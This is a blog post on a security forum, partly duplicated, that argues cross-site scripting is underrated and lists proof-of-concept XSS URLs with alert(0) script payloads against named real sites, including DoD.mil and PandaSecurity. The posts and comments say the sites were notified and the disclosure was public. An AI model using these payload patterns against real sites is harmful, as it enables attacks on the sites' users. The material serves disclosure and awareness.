» Insecurity Issues at its Best
The InterN0T Crew |
About
Insecurity Issues at its Best
[Cross Site Scripting, should always be taken seriously even though it is merely a client-side attack]
On todays Internet there are so many developers, administrators and even IT-security consultants that
doesn't consider Cross Site Scripting aka XSS as a serious threat. It is truly amazing that so many sites,
contains this class of security bug that has existed for years.
With XSS-attacks it's possible to use javascript to read the HTML-code, thereby also CSRF-tokens used
to prevent such attacks. In fact with todays more and more advanced examples of XSS-worms, it's only
the hackers imagination and own skills that sets the limit.
Cross Site Scripting becomes truly dangerous when combined with f.ex. browser-exploitation, phishing
or perhaps propaganda. The only thing it requires is a user / victim to click the maliciously crafted url.
In the following proof of concept, sites that should have been secure will be disclosed showing that
even these contain this kind of security bug even though they shouldnt.
Proof of Concept
TechWorld:
http://search.techworld.com/search/?intcmp=ros-hd-srch&q=%3Cbody%20onload=%22alert(0)%22%3E
COP15.dk
1. http://en.cop15.dk/frontpage/access/login?orgurl=data:text/html,<script>alert(0)</script>
2. http://www1.cop15.meta-fusion.com/kongresse/cop15/templ/ovw.php?id_kongressmain=1&theme=<script>alert(0)</script>
Social-Engineer.org:
- XSS in a plugin which I made an advisory for.
DoD.mil:
https://metadata.dod.mil/mdr/documents.htm?page=<script>alert(0)</script>
PandaSecurity.com:
http://www.pandasecurity.com/sitesearch/?hl=es&lr=lang_es&nq=site%3awww.pandasecurity.com %2fspain%2f&term=%27;alert(0);a%3D%27/
Orbasoft:
http://ftp.orbasoft.com/livezilla/livezilla.php?%27%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
PET.dk:
http://www.pet.dk/Main.aspx?path=/<script>alert(0)</script>
Conclusion
All of the above sites have or had these vulnerabilities for over 2 months.
They have also been notified and will hopefully fix these vulnerabilities soon if they haven't.
Since only very few of the above sites run with open source we only supplied a patch to 1 of these.
There was a lot more sites that was an original part of the list but we decided to remove them and
only write about those we thought would be the most critical.
~ MaXe
On todays Internet there are so many developers, administrators and even IT-security consultants that
doesn't consider Cross Site Scripting aka XSS as a serious threat. It is truly amazing that so many sites,
contains this class of security bug that has existed for years.
With XSS-attacks it's possible to use javascript to read the HTML-code, thereby also CSRF-tokens used
to prevent such attacks. In fact with todays more and more advanced examples of XSS-worms, it's only
the hackers imagination and own skills that sets the limit.
Cross Site Scripting becomes truly dangerous when combined with f.ex. browser-exploitation, phishing
or perhaps propaganda. The only thing it requires is a user / victim to click the maliciously crafted url.
In the following proof of concept, sites that should have been secure will be disclosed showing that
even these contain this kind of security bug even though they shouldnt.
Proof of Concept
TechWorld:
http://search.techworld.com/search/?intcmp=ros-hd-srch&q=%3Cbody%20onload=%22alert(0)%22%3E
COP15.dk
1. http://en.cop15.dk/frontpage/access/login?orgurl=data:text/html,<script>alert(0)</script>
2. http://www1.cop15.meta-fusion.com/kongresse/cop15/templ/ovw.php?id_kongressmain=1&theme=<script>alert(0)</script>
Social-Engineer.org:
- XSS in a plugin which I made an advisory for.
DoD.mil:
https://metadata.dod.mil/mdr/documents.htm?page=<script>alert(0)</script>
PandaSecurity.com:
http://www.pandasecurity.com/sitesearch/?hl=es&lr=lang_es&nq=site%3awww.pandasecurity.com %2fspain%2f&term=%27;alert(0);a%3D%27/
Orbasoft:
http://ftp.orbasoft.com/livezilla/livezilla.php?%27%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
PET.dk:
http://www.pet.dk/Main.aspx?path=/<script>alert(0)</script>
Conclusion
All of the above sites have or had these vulnerabilities for over 2 months.
They have also been notified and will hopefully fix these vulnerabilities soon if they haven't.
Since only very few of the above sites run with open source we only supplied a patch to 1 of these.
There was a lot more sites that was an original part of the list but we decided to remove them and
only write about those we thought would be the most critical.
~ MaXe
Total Comments 3
Comments
-
As allways good work MaXe :)Posted 6th February 2010 at 12:04 by eXeDK 
-
Thanks eXeDK :-P Apparently no one dares to write about it so I just disclosed it to the public anyway ;-)
In hope that the vulnerabilities will get fixed faster since many companies are very slow to fix small vulnerabilities
which takes me 5 minutes to fix (usually).Posted 7th February 2010 at 16:20 by MaXe - Yep, true. XSS is being underestimated a lot by people who doesn't know it could do a great damage, not to the server, but to the users.
Posted 8th February 2010 at 09:19 by zer0bytes
